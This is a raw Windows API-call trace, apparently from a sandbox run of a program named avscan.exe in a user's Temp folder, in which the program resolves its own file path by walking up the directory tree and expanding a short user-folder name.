[0163.358] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0163.358] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fdc4*="c:\\windows\\") returned 1 [0163.358] SysReAllocStringLen (in: pbstr=0x2ad25b0*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x2ad25b0*="c:\\windows\\") returned 1 [0163.358] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x108bcc4, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0163.359] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\Ap", cchLength=0x14 | out: lpsz="c:\\users\\keecfm~1\\ap") returned 0x14 [0163.359] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28fae4, lpFilePart=0x28fae0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28fae0*="avscan.exe") returned 0x2f [0163.359] SysReAllocStringLen (in: pbstr=0x2ad25a8*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x2ad25a8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0163.359] SysReAllocStringLen (in: pbstr=0x28fdb0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0163.359] GetThreadLocale () returned 0x409 [0163.359] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.359] GetThreadLocale () returned 0x409 [0163.360] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.360] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28fa90*="avscan.exe") returned 0x2f [0163.360] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0163.360] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f7d8*="avscan.exe") returned 0x2f [0163.360] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0163.361] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0163.361] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.361] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.361] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0163.361] SetLastError (dwErrCode=0x0) [0163.361] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0163.361] GetLastError () returned 0x0 [0163.361] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x70, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x5e, ftLastWriteTime.dwLowDateTime=0x108a834, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x108a834, dwReserved0=0x28fa94, dwReserved1=0x5e, cFileName="뽜Tﳘ(p", cAlternateFileName="ꞼĈ꠴Ĉ^")) returned 0xffffffff [0163.362] GetLastError () returned 0x2 [0163.362] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.362] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0163.362] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0163.363] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0163.376] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0163.376] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.376] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.376] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0163.376] SetLastError (dwErrCode=0x0) [0163.376] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0163.376] GetLastError () returned 0x0 [0163.376] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x70, ftCreationTime.dwHighDateTime=0x28f7a8, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x5e, ftLastWriteTime.dwLowDateTime=0x108b2bc, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0x108b2bc, dwReserved0=0x28f7dc, dwReserved1=0x5e, cFileName="ꞼĈﳔ(\x0b", cAlternateFileName="댴Ĉ돤ĈH")) returned 0xffffffff [0163.377] GetLastError () returned 0x2 [0163.377] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.377] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0163.377] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0163.378] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0163.378] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0163.378] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.378] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.378] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0163.378] SetLastError (dwErrCode=0x0) [0163.378] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0163.378] GetLastError () returned 0x0 [0163.379] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f4e8, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x108b38c, ftLastWriteTime.dwHighDateTime=0x28f508, nFileSizeHigh=0x775d4628, nFileSizeLow=0x108b38c, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="댴Ĉ塚(\x0b", cAlternateFileName="됼Ĉ쀤Ĉ>")) returned 0xffffffff [0163.383] GetLastError () returned 0x2 [0163.383] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.383] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0163.384] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0163.384] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0163.384] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0163.384] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.384] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0163.385] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0163.385] SetLastError (dwErrCode=0x0) [0163.385] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0163.385] GetLastError () returned 0x0 [0163.385] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x40, nFileSizeLow=0x1086880, dwReserved0=0x78000, dwReserved1=0x10775c8, cFileName="\n", cAlternateFileName="楤Ĉ検Ĉ2")) returned 0xffffffff [0163.385] GetLastError () returned 0x2 [0163.385] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0163.385] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0163.385] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0163.386] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0163.386] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0163.386] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.386] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0163.386] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0163.386] SetLastError (dwErrCode=0x0) [0163.386] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0163.386] GetLastError () returned 0x0 [0163.386] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x30, nFileSizeLow=0x108b5b0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="楤Ĉ(@", cAlternateFileName="뙤Ĉ뗴Ĉ\"")) returned 0xffffffff [0163.387] GetLastError () returned 0x2 [0163.387] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0163.387] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0163.387] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0163.387] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0163.387] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0163.388] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.388] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0163.388] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.388] SetLastError (dwErrCode=0x0) [0163.388] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0163.388] GetLastError () returned 0x0 [0163.388] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x108c478 [0163.388] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0163.388] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0163.389] FindClose (in: hFindFile=0x108c478 | out: hFindFile=0x108c478) returned 1 [0163.389] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0163.389] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0163.389] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0163.389] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108c478 [0163.390] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0163.390] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0163.390] FindClose (in: hFindFile=0x108c478 | out: hFindFile=0x108c478) returned 1 [0163.391] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0163.391] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0163.391] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0163.391] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x78000, dwReserved1=0x10775c8, cFileName="AppData", cAlternateFileName="")) returned 0x108c478 [0163.391] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0163.391] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0163.392] FindClose (in: hFindFile=0x108c478 | out: hFindFile=0x108c478) returned 1 [0163.392] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.392] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.392] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0163.392] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x108c4d0 [0163.393] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0163.393] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0163.393] FindClose (in: hFindFile=0x108c4d0 | out: hFindFile=0x108c4d0) returned 1 [0163.393] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.394] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.394] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0163.394] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x5e, cFileName="Temp", cAlternateFileName="")) returned 0x108c4d0 [0163.394] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0163.394] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0163.398] FindClose (in: hFindFile=0x108c4d0 | out: hFindFile=0x108c4d0) returned 1 [0163.399] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0163.399] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0163.399] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0163.399] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf38c1580, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf67c4800, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x1442557, dwReserved0=0x28fa94, dwReserved1=0x5e, cFileName="avscan.exe", cAlternateFileName="")) returned 0x108c4d0 [0163.399] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0163.399] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0163.399] FindClose (in: hFindFile=0x108c4d0 | out: hFindFile=0x108c4d0) returned 1 [0163.400] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", len=0x30 | out: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0163.400] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", len=0x30 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0163.400] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", cchLength=0x30 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 0x30 [0163.400] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", len=0x30 | out: pbstr=0x28fdb0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 1 [0163.400] SysReAllocStringLen (in: pbstr=0x2ad25a8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", len=0x30 | out: pbstr=0x2ad25a8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 1 [0163.400] SysReAllocStringLen (in: pbstr=0x2ad25b8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x2ad25b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 